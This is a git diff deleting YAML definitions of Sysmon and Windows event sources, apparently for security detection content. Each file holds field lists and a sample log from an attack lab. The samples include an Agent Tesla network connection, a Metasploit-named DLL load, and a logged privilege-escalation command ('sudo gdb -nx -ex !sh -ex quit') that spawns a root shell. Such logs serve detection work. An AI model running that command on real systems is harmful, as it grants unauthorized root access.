diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_22.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_22.yml
deleted file mode 100644
index 34a02fa4b9..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_22.yml
+++ /dev/null
@@ -1,70 +0,0 @@
-event_name: Sysmon EventID 22
-fields:
-- _time
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- QueryName
-- QueryResults
-- QueryStatus
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- process_exec
-- process_guid
-- process_name
-- punct
-- query
-- query_count
-- reply_code_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>22</EventID><Version>5</Version><Level>4</Level><Task>22</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2021-03-24T12:25:15.098978900Z'/><EventRecordID>113892</EventRecordID><Correlation/><Execution ProcessID='2332' ThreadID='3400'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-299.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2021-03-24 12:25:12.840</Data><Data Name='ProcessGuid'>{3CFDEE80-2F7D-605B-F50A-00000000AE01}</Data><Data Name='ProcessId'>7172</Data><Data Name='QueryName'>50.220.65.3.spam.dnsbl.sorbs.net</Data><Data Name='QueryStatus'>9003</Data><Data Name='QueryResults'>-</Data><Data Name='Image'>C:\Windows\System32\wermgr.exe</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_23.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_23.yml
deleted file mode 100644
index 328acf206f..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_23.yml
+++ /dev/null
@@ -1,82 +0,0 @@
-event_name: Sysmon EventID 23
-fields:
-- _time
-- Archived
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Hashes
-- IMPHASH
-- Image
-- IsExecutable
-- Keywords
-- Level
-- MD5
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RuleName
-- SHA256
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- TargetFilename
-- Task
-- ThreadID
-- TimeCreated
-- User
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- file_hash
-- file_modify_time
-- file_name
-- file_path
-- host
-- id
-- index
-- linecount
-- object_category
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- tag::object_category
-- timeendpos
-- timestartpos
-- user
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>23</EventID><Version>5</Version><Level>4</Level><Task>23</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2023-02-01T10:57:09.815326000Z'/><EventRecordID>281771</EventRecordID><Correlation/><Execution ProcessID='2612' ThreadID='2304'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-ctus-attack-range-865.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2023-02-01 10:57:09.814</Data><Data Name='ProcessGuid'>{F522A29C-446D-63DA-9F01-00000000BB02}</Data><Data Name='ProcessId'>2428</Data><Data Name='User'>ATTACKRANGE\Administrator</Data><Data Name='Image'>C:\Temp\swiftslicer.exe</Data><Data Name='TargetFilename'>C:\Python311\vcruntime140_1.dll</Data><Data Name='Hashes'>MD5=75E78E4BF561031D39F86143753400FF,SHA256=1758085A61527B427C4380F0C976D29A8BEE889F2AC480C356A3F166433BF70E,IMPHASH=BF380CA954CBF10D1A4CEF9EC18E46FD</Data><Data Name='IsExecutable'>true</Data><Data Name='Archived'>false - insufficient disk space</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_3.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_3.yml
deleted file mode 100644
index ec836a5df8..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_3.yml
+++ /dev/null
@@ -1,96 +0,0 @@
-event_name: Sysmon EventID 3
-fields:
-- _time
-- Channel
-- Computer
-- DestinationHostname
-- DestinationIp
-- DestinationIsIpv6
-- DestinationPort
-- DestinationPortName
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Image
-- Initiated
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- Protocol
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SourceHostname
-- SourceIp
-- SourceIsIpv6
-- SourcePort
-- SourcePortName
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- User
-- UserID
-- UtcTime
-- Version
-- action
-- app
-- creation_time
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_ip
-- dest_port
-- direction
-- dvc
-- dvc_ip
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- process_exec
-- process_guid
-- process_id
-- process_name
-- protocol
-- protocol_version
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- src_host
-- src_ip
-- src_port
-- state
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- transport
-- transport_dest_port
-- user
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>3</EventID><Version>5</Version><Level>4</Level><Task>3</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2022-09-15T12:56:22.958249300Z'/><EventRecordID>156837</EventRecordID><Correlation/><Execution ProcessID='2684' ThreadID='1380'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-ctus-attack-range-403.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2022-09-15 12:56:19.679</Data><Data Name='ProcessGuid'>{6820D070-1F1B-6323-E113-000000007402}</Data><Data Name='ProcessId'>5728</Data><Data Name='Image'>C:\Temp\agent_tesla-deob.exe</Data><Data Name='User'>ATTACKRANGE\Administrator</Data><Data Name='Protocol'>tcp</Data><Data Name='Initiated'>true</Data><Data Name='SourceIsIpv6'>false</Data><Data Name='SourceIp'>10.0.1.14</Data><Data Name='SourceHostname'>win-dc-ctus-attack-range-403.attackrange.local</Data><Data Name='SourcePort'>61722</Data><Data Name='SourcePortName'>-</Data><Data Name='DestinationIsIpv6'>false</Data><Data Name='DestinationIp'>41.77.117.236</Data><Data Name='DestinationHostname'>youssef5.genious.net</Data><Data Name='DestinationPort'>21</Data><Data Name='DestinationPortName'>ftp</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_5.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_5.yml
deleted file mode 100644
index 7da0d70117..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_5.yml
+++ /dev/null
@@ -1,69 +0,0 @@
-event_name: Sysmon EventID 5
-fields:
-- _time
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- os
-- process
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>5</EventID><Version>3</Version><Level>4</Level><Task>5</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2021-03-16T14:01:44.008858500Z'/><EventRecordID>39965</EventRecordID><Correlation/><Execution ProcessID='2784' ThreadID='3256'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-654.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2021-03-16 14:01:44.004</Data><Data Name='ProcessGuid'>{26337912-BA32-6050-3506-00000000AE01}</Data><Data Name='ProcessId'>8672</Data><Data Name='Image'>C:\Users\Public\steam.exe</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_6.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_6.yml
deleted file mode 100644
index a5189bfa22..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_6.yml
+++ /dev/null
@@ -1,71 +0,0 @@
-event_name: Sysmon EventID 6
-fields:
-- _time
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Hashes
-- ImageLoaded
-- Keywords
-- Level
-- MD5
-- Name
-- Opcode
-- ProcessID
-- RecordID
-- RecordNumber
-- RuleName
-- SHA256
-- SecurityID
-- Signature
-- SignatureStatus
-- Signed
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- os
-- process_hash
-- process_path
-- punct
-- service_signature_exists
-- service_signature_verified
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>6</EventID><Version>4</Version><Level>4</Level><Task>6</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2022-04-04T17:37:04.643206900Z'/><EventRecordID>15708989</EventRecordID><Correlation/><Execution ProcessID='2988' ThreadID='2408'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-mhaag-attack-range-702.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2022-04-04 17:37:04.640</Data><Data Name='ImageLoaded'>C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sys</Data><Data Name='Hashes'>MD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6</Data><Data Name='Signed'>true</Data><Data Name='Signature'>Riverbed Technology, Inc.</Data><Data Name='SignatureStatus'>Valid</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_7.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_7.yml
deleted file mode 100644
index faf98ea79f..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_7.yml
+++ /dev/null
@@ -1,90 +0,0 @@
-event_name: Sysmon EventID 7
-fields:
-- _time
-- Channel
-- Company
-- Computer
-- Description
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- FileVersion
-- Guid
-- Hashes
-- IMPHASH
-- Image
-- ImageLoaded
-- Keywords
-- Level
-- MD5
-- Name
-- Opcode
-- OriginalFileName
-- ProcessGuid
-- ProcessID
-- ProcessId
-- Product
-- RecordID
-- RecordNumber
-- RuleName
-- SHA256
-- SecurityID
-- Signature
-- SignatureStatus
-- Signed
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- User
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- os
-- parent_process_exec
-- parent_process_guid
-- parent_process_id
-- parent_process_name
-- parent_process_path
-- process_exec
-- process_hash
-- process_name
-- process_path
-- punct
-- service_dll_signature_exists
-- service_dll_signature_verified
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>7</EventID><Version>3</Version><Level>4</Level><Task>7</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2023-09-12T08:06:31.445185300Z'/><EventRecordID>45273</EventRecordID><Correlation/><Execution ProcessID='2464' ThreadID='2888'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2023-09-12 08:06:31.433</Data><Data Name='ProcessGuid'>{8814F3F5-1C07-6500-9600-000000000E03}</Data><Data Name='ProcessId'>4440</Data><Data Name='Image'>C:\Users\Administrator\AppData\Local\Temp\server.exe</Data><Data Name='ImageLoaded'>C:\Users\Administrator\AppData\Local\Temp\server.exe</Data><Data Name='FileVersion'>-</Data><Data Name='Description'>-</Data><Data Name='Product'>-</Data><Data Name='Company'>-</Data><Data Name='OriginalFileName'>-</Data><Data Name='Hashes'>MD5=696CBE2CB6F7FAC5ED6262BCA51238BB,SHA256=43005D86607DC94C7D378AA1B8844947BAA03860652F2F2340266061AF12E524,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744</Data><Data Name='Signed'>false</Data><Data Name='Signature'>-</Data><Data Name='SignatureStatus'>Unavailable</Data><Data Name='User'>ATTACKRANGE\Administrator</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_8.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_8.yml
deleted file mode 100644
index 57382aab01..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_8.yml
+++ /dev/null
@@ -1,83 +0,0 @@
-event_name: Sysmon EventID 8
-fields:
-- _time
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- NewThreadId
-- Opcode
-- ProcessID
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SourceImage
-- SourceProcessGuid
-- SourceProcessId
-- StartAddress
-- StartFunction
-- StartModule
-- SystemTime
-- System_Props_Xml
-- TargetImage
-- TargetProcessGuid
-- TargetProcessId
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- os
-- parent_process_exec
-- parent_process_guid
-- parent_process_id
-- parent_process_name
-- parent_process_path
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_address
-- src_function
-- src_module
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>8</EventID><Version>2</Version><Level>4</Level><Task>8</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2022-10-27T13:59:12.440938600Z'/><EventRecordID>362233</EventRecordID><Correlation/><Execution ProcessID='2656' ThreadID='2360'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-ctus-attack-range-487.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2022-10-27 13:59:12.427</Data><Data Name='SourceProcessGuid'>{3381F800-8EB0-635A-1306-000000008A02}</Data><Data Name='SourceProcessId'>4864</Data><Data Name='SourceImage'>C:\Windows\SysWOW64\wermgr.exe</Data><Data Name='TargetProcessGuid'>{3381F800-8085-635A-2701-000000008A02}</Data><Data Name='TargetProcessId'>5572</Data><Data Name='TargetImage'>C:\Windows\System32\Taskmgr.exe</Data><Data Name='NewThreadId'>4964</Data><Data Name='StartAddress'>0x0000000000C20000</Data><Data Name='StartModule'>-</Data><Data Name='StartFunction'>-</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_9.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_9.yml
deleted file mode 100644
index 84018c25cd..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_9.yml
+++ /dev/null
@@ -1,69 +0,0 @@
-event_name: Sysmon EventID 9
-fields:
-- _time
-- Channel
-- Computer
-- Device
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- os
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>9</EventID><Version>2</Version><Level>4</Level><Task>9</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2022-02-25T12:25:33.375618100Z'/><EventRecordID>190607</EventRecordID><Correlation/><Execution ProcessID='2724' ThreadID='2436'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-tcontreras-attack-range-478.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2022-02-25 12:25:33.359</Data><Data Name='ProcessGuid'>{414E8EDF-CABB-6218-F103-000000003702}</Data><Data Name='ProcessId'>6068</Data><Data Name='Image'>C:\Temp\c.exe</Data><Data Name='Device'>\Device\HarddiskVolume1</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_for_Linux_EventID_1.yml b/data_sources/endpoint/event_sources/Sysmon_for_Linux_EventID_1.yml
deleted file mode 100644
index 2261b4563c..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_for_Linux_EventID_1.yml
+++ /dev/null
@@ -1,91 +0,0 @@
-event_name: Sysmon for Linux EventID 1
-fields:
-- _time
-- Channel
-- CommandLine
-- Company
-- Computer
-- CurrentDirectory
-- Description
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- FileVersion
-- Guid
-- Hashes
-- Image
-- IntegrityLevel
-- Keywords
-- Level
-- LogonGuid
-- LogonId
-- Name
-- Opcode
-- OriginalFileName
-- ParentCommandLine
-- ParentImage
-- ParentProcessGuid
-- ParentProcessId
-- ParentUser
-- ProcessGuid
-- ProcessID
-- ProcessId
-- Product
-- RecordID
-- RuleName
-- SystemTime
-- System_Props_Xml
-- Task
-- TerminalSessionId
-- ThreadID
-- User
-- UserId
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- eventtype
-- host
-- index
-- linecount
-- original_file_name
-- os
-- parent_process
-- parent_process_exec
-- parent_process_guid
-- parent_process_id
-- parent_process_name
-- parent_process_path
-- process
-- process_current_directory
-- process_exec
-- process_guid
-- process_hash
-- process_id
-- process_integrity_level
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- vendor_product
-example_log: <Event><System><Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/><EventID>1</EventID><Version>5</Version><Level>4</Level><Task>1</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime="2022-08-09T10:42:47.749450000Z"/><EventRecordID>1926574</EventRecordID><Correlation/><Execution ProcessID="1465" ThreadID="1465"/><Channel>Linux-Sysmon/Operational</Channel><Computer>ar-linux</Computer><Security UserId="0"/></System><EventData><Data Name="RuleName">-</Data><Data Name="UtcTime">2022-08-09 10:42:47.757</Data><Data Name="ProcessGuid">{ec23eae3-3a27-62f2-085e-16549b550000}</Data><Data Name="ProcessId">10268</Data><Data Name="Image">/usr/bin/sudo</Data><Data Name="FileVersion">-</Data><Data Name="Description">-</Data><Data Name="Product">-</Data><Data Name="Company">-</Data><Data Name="OriginalFileName">-</Data><Data Name="CommandLine">sudo gdb -nx -ex !sh -ex quit</Data><Data Name="CurrentDirectory">/home/ubuntu</Data><Data Name="User">ubuntu</Data><Data Name="LogonGuid">{ec23eae3-315b-62f2-e803-000000000000}</Data><Data Name="LogonId">1000</Data><Data Name="TerminalSessionId">13</Data><Data Name="IntegrityLevel">no level</Data><Data Name="Hashes">-</Data><Data Name="ParentProcessGuid">{ec23eae3-315b-62f2-4884-4ea587550000}</Data><Data Name="ParentProcessId">15369</Data><Data Name="ParentImage">/bin/bash</Data><Data Name="ParentCommandLine">-bash</Data><Data Name="ParentUser">ubuntu</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_for_Linux_EventID_11.yml b/data_sources/endpoint/event_sources/Sysmon_for_Linux_EventID_11.yml
deleted file mode 100644
index 6b660ad3b8..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_for_Linux_EventID_11.yml
+++ /dev/null
@@ -1,69 +0,0 @@
-event_name: Sysmon for Linux EventID 11
-fields:
-- _time
-- Channel
-- Computer
-- CreationUtcTime
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RuleName
-- SystemTime
-- System_Props_Xml
-- TargetFilename
-- Task
-- ThreadID
-- User
-- UserId
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- eventtype
-- file_create_time
-- file_name
-- file_path
-- host
-- index
-- linecount
-- object_category
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- tag::object_category
-- timeendpos
-- timestartpos
-- user
-- vendor_product
-example_log: <Event><System><Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/><EventID>11</EventID><Version>2</Version><Level>4</Level><Task>11</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime="2021-12-20T16:07:17.927963000Z"/><EventRecordID>792913</EventRecordID><Correlation/><Execution ProcessID="4372" ThreadID="4372"/><Channel>Linux-Sysmon/Operational</Channel><Computer>sysmonlinux-tcontreras-attack-range-4134</Computer><Security UserId="0"/></System><EventData><Data Name="RuleName">-</Data><Data Name="UtcTime">2021-12-20 16:07:17.929</Data><Data Name="ProcessGuid">{ec2c97d1-6aa9-61c0-3038-618238560000}</Data><Data Name="ProcessId">5256</Data><Data Name="Image">/opt/splunkforwarder/bin/splunkd</Data><Data Name="TargetFilename">/opt/splunkforwarder/var/lib/splunk/modinputs/journald/sysmon.checkpoint.tmp.dbed9d351dcc1806</Data><Data Name="CreationUtcTime">2021-12-20 16:07:17.929</Data><Data Name="User">root</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Application_2282.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Application_2282.yml
deleted file mode 100644
index 3b6313937b..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Application_2282.yml
+++ /dev/null
@@ -1,53 +0,0 @@
-event_name: Windows Event Log Application 2282
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventRecordID
-- EventSourceName
-- Guid
-- Keywords
-- Level
-- ModuleDll
-- Name
-- Opcode
-- ProcessID
-- ProcessorArchitecture
-- Qualifiers
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-IIS-W3SVC-WP' Guid='{670080D9-742A-4187-8D16-41143D1290BD}' EventSourceName='W3SVC-WP'/><EventID Qualifiers='49152'>2282</EventID><Version>0</Version><Level>2</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x80000000000000</Keywords><TimeCreated SystemTime='2022-12-20T15:58:25.325383600Z'/><EventRecordID>1001307</EventRecordID><Correlation/><Execution ProcessID='0' ThreadID='0'/><Channel>Application</Channel><Computer>win-dc-exch01.attackrange.local</Computer><Security/></System><EventData><Data Name='ModuleDll'>c:\temp\msf.dll</Data><Data Name='ProcessorArchitecture'>AMD64</Data><Binary>C1000000</Binary></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Application_3000.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Application_3000.yml
deleted file mode 100644
index 246826e7ed..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Application_3000.yml
+++ /dev/null
@@ -1,47 +0,0 @@
-event_name: Windows Event Log Application 3000
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventRecordID
-- EventSourceName
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- Qualifiers
-- RecordNumber
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserID
-- Version
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- param1
-- param2
-- param3
-- punct
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timestamp
-- user_id
-- vendor_product
